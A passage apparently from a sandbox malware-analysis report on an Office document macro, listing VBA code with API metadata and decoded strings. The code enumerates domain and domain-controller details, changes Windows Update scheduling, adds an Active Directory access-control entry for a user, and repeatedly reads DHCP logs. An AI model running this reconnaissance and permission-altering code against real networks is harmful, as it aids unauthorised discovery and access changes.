    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    2266

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    2269

    For Each objItem in colItems

    2270

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    2271

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    2272

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    2273

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    2274

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    2275

    Wscript.Echo

    Echo

    2276

    Next

    2280

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    2281

    Set objSettings = objAutoUpdate.Settings

    Settings

    2283

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    2284

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    2286

    objSettings.Save

    Save

    2293

    On Error Resume Next

    2295

    strComputer = "."

    2296

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    2299

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    2301

    For Each objItem in colItems

    2302

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    2303

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    2304

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    2305

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    2306

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    2308

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    2310

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    2311

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    2312

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    2313

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    2314

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    2315

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    2316

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    2317

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    2318

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    2320

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    2322

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    2323

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    2324

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    2325

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    2326

    Wscript.Echo

    Echo

    2327

    Next

    2333

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    2334

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    2335

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    2336

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    2337

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    2339

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    2340

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    2341

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    2343

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    2345

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    2346

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    2347

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    2348

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    2349

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    2350

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    2351

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    2352

    objDacl.AddAce objAce

    AddAce

    2354

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    2356

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    2357

    objSDUtil.SetInfo

    SetInfo

    2365

    On Error Resume Next

    2367

    strComputer = "."

    2368

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    2371

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    2374

    For Each objItem in colItems

    2375

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    2376

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    2377

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    2378

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    2379

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    2380

    Wscript.Echo

    Echo

    2381

    Next

    2385

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    2386

    Set objSettings = objAutoUpdate.Settings

    Settings

    2388

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    2389

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    2391

    objSettings.Save

    Save

    2398

    On Error Resume Next

    2400

    strComputer = "."

    2401

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    2404

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    2406

    For Each objItem in colItems

    2407

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    2408

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    2409

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    2410

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    2411

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    2413

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    2415

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    2416

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    2417

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    2418

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    2419

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    2420

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    2421

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    2422

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    2423

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    2425

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    2427

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    2428

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    2429

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    2430

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    2431

    Wscript.Echo

    Echo

    2432

    Next

    2439

    End Sub

    APIsMeta Information

    Part of subcall function CheckValidUtf8@ThisDocument: CreateObject

    Part of subcall function CheckValidUtf8@ThisDocument: Type

    Part of subcall function CheckValidUtf8@ThisDocument: Open

    Part of subcall function CheckValidUtf8@ThisDocument: LoadFromFile

    Part of subcall function CheckValidUtf8@ThisDocument: Read

    Part of subcall function CheckValidUtf8@ThisDocument: Close

    Part of subcall function CheckValidUtf8@ThisDocument: LenB

    Part of subcall function CheckValidUtf8@ThisDocument: AscB

    Part of subcall function CheckValidUtf8@ThisDocument: MidB

    CreateObject

    Open

    Type

    LoadFromFile

    Hex

    AscB

    Read

    Close

    RegRead

    StringsDecrypted Strings
    "utf-8"
    "utf-8"
    "ADODB.Stream"
    "HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage\ACP"
    "Windows-"
    "EF"
    "utf-8"
    "utf-8"
    "FF"
    "UTF-16-LE"
    "UTF-16-LE"
    "FE"
    "UTF-16-BE"
    "UTF-16-BE"
    LineInstructionMeta Information
    4159

    Function charset(strFile)

    4161

    If CheckValidUtf8(strFile) Then

    4162

    charset = "utf-8"

    4163

    Exit Function

    4164

    Endif

    4166

    Set objStream = CreateObject("ADODB.Stream")

    CreateObject

    4167

    objStream.Open

    Open

    4168

    objStream.Type = 1

    Type

    4169

    objStream.LoadFromFile strFile

    LoadFromFile

    4170

    First = Hex(AscB(objStream.Read(1)))

    Hex

    AscB

    Read

    4171

    objStream.Close

    Close

    4173

    ch = "Windows-" & WshShell.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage\ACP")

    RegRead

    4174

    If First = "EF" Then

    4175

    ch = "utf-8"

    4176

    Elseif First = "FF" Then

    4177

    ch = "UTF-16-LE"

    4178

    Elseif First = "FE" Then

    4179

    ch = "UTF-16-BE"

    4180

    Endif

    4181

    charset = ch

    4182

    End Function

    APIsMeta Information

    CreateObject

    Type

    Open

    LoadFromFile

    Read

    Close

    LenB

    AscB

    MidB

    StringsDecrypted Strings
    "ADODB.Stream"
    LineInstructionMeta Information
    4184

    Function CheckValidUtf8(path)

    4186

    limit = - 1

    4188

    Set Stream = CreateObject("ADODB.Stream")

    CreateObject

    4189

    Stream.Type = 1

    Type

    4190

    Stream.Open

    Open

    4191

    Stream.LoadFromFile path

    LoadFromFile

    4192

    s = Stream.Read(limit)

    Read

    4193

    Stream.Close

    Close

    4195

    l = LenB(s)

    LenB

    4197

    ret = True

    4199

    For i = 1 To l

    4200

    a = AscB(MidB(s, i, 1))

    AscB

    MidB

    4201

    r0 = a And &H80

    4202

    r1 = a And &HC0

    4203

    r2 = a And &HE0

    4204

    r3 = a And &HF0

    4205

    r4 = a And &HF8

    4207

    If n > 0 Then

    4208

    If r1 = &H80 Then

    4209

    n = n - 1

    4210

    Else

    4211

    ret = False

    4212

    Exit For

    4213

    Endif

    4214

    Else

    4215

    If r4 = &HF0 Then

    4216

    n = 3

    4217

    Elseif r3 = &HE0 Then

    4218

    n = 2

    4219

    Elseif r2 = &HC0 Then

    4220

    n = 1

    4221

    Elseif r0 = 0 Then

    4222

    n = 0

    4223

    Else

    4224

    ret = False

    4225

    Exit For

    4226

    Endif

    4227

    Endif

    4228

    Next

    4230

    CheckValidUtf8 = ret

    4231

    End Function

    APIsMeta Information

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    CreateObject

    OpenTextFile

    ForReading

    Echo

    vbCrLf

    AtEndOfStream

    ReadLine

    InStr

    Split

    Echo

    vbCrLf

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    Echo

    vbCrLf

    StringsDecrypted Strings
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    "Scripting.FileSystemObject"
    "C:\Windows\System32\DHCP\""DhcpSrvLog-Mon.log"
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Description: "
    "Host Name: "
    "IP Address: "
    "MAC Address: "
    "Time: "
    ","
    "Date: "
    "Time: "
    "Description: "
    "IP Address: "
    "Host Name: "
    "MAC Address: "
    LineInstructionMeta Information
    168

    Private Sub TI()

    174

    Const ForReading = 1

    176

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    177

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    180

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    182

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    183

    strLine = objtextFile.ReadLine

    ReadLine

    184

    If InStr(strLine, ",") Then

    InStr

    185

    arrDHCPRecord = Split(strLine, ",")

    Split

    186

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    187

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    188

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    189

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    190

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    191

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    192

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    193

    i = i + 1

    194

    Endif

    195

    Loop

    AtEndOfStream

    197

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    199

    Const ForReading = 1

    201

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    202

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    205

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    207

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    208

    strLine = objtextFile.ReadLine

    ReadLine

    209

    If InStr(strLine, ",") Then

    InStr

    210

    arrDHCPRecord = Split(strLine, ",")

    Split

    211

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    212

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    213

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    214

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    215

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    216

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    217

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    218

    i = i + 1

    219

    Endif

    220

    Loop

    AtEndOfStream

    222

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    224

    Const ForReading = 1

    226

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    227

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    230

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    232

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    233

    strLine = objtextFile.ReadLine

    ReadLine

    234

    If InStr(strLine, ",") Then

    InStr

    235

    arrDHCPRecord = Split(strLine, ",")

    Split

    236

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    237

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    238

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    239

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    240

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    241

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    242

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    243

    i = i + 1

    244

    Endif

    245

    Loop

    AtEndOfStream

    247

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    251

    Const ForReading = 1

    253

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    254

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    257

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    259

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    260

    strLine = objtextFile.ReadLine

    ReadLine

    261

    If InStr(strLine, ",") Then

    InStr

    262

    arrDHCPRecord = Split(strLine, ",")

    Split

    263

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    264

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    265

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    266

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    267

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    268

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    269

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    270

    i = i + 1

    271

    Endif

    272

    Loop

    AtEndOfStream

    274

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    275

    Const ForReading = 1

    277

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    278

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    281

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    283

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    284

    strLine = objtextFile.ReadLine

    ReadLine

    285

    If InStr(strLine, ",") Then

    InStr

    286

    arrDHCPRecord = Split(strLine, ",")

    Split

    287

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    288

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    289

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    290

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    291

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    292

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    293

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    294

    i = i + 1

    295

    Endif

    296

    Loop

    AtEndOfStream

    298

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    299

    Const ForReading = 1

    301

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    302

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    305

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    307

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    308

    strLine = objtextFile.ReadLine

    ReadLine

    309

    If InStr(strLine, ",") Then

    InStr

    310

    arrDHCPRecord = Split(strLine, ",")

    Split

    311

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    312

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    313

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    314

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    315

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    316

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    317

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    318

    i = i + 1

    319

    Endif

    320

    Loop

    AtEndOfStream

    322

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    323

    Const ForReading = 1

    325

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    326

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    329

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    331

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    332

    strLine = objtextFile.ReadLine

    ReadLine

    333

    If InStr(strLine, ",") Then

    InStr

    334

    arrDHCPRecord = Split(strLine, ",")

    Split

    335

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    336

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    337

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    338

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    339

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    340

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    341

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    342

    i = i + 1

    343

    Endif

    344

    Loop

    AtEndOfStream

    346

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    347

    Const ForReading = 1

    349

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    350

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    353

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    355

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    356

    strLine = objtextFile.ReadLine

    ReadLine

    357

    If InStr(strLine, ",") Then

    InStr

    358

    arrDHCPRecord = Split(strLine, ",")

    Split

    359

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    360

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    361

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    362

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    363

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    364

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    365

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    366

    i = i + 1

    367

    Endif

    368

    Loop

    AtEndOfStream

    370

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    371

    Const ForReading = 1

    373

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    374

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    377

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    379

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    380

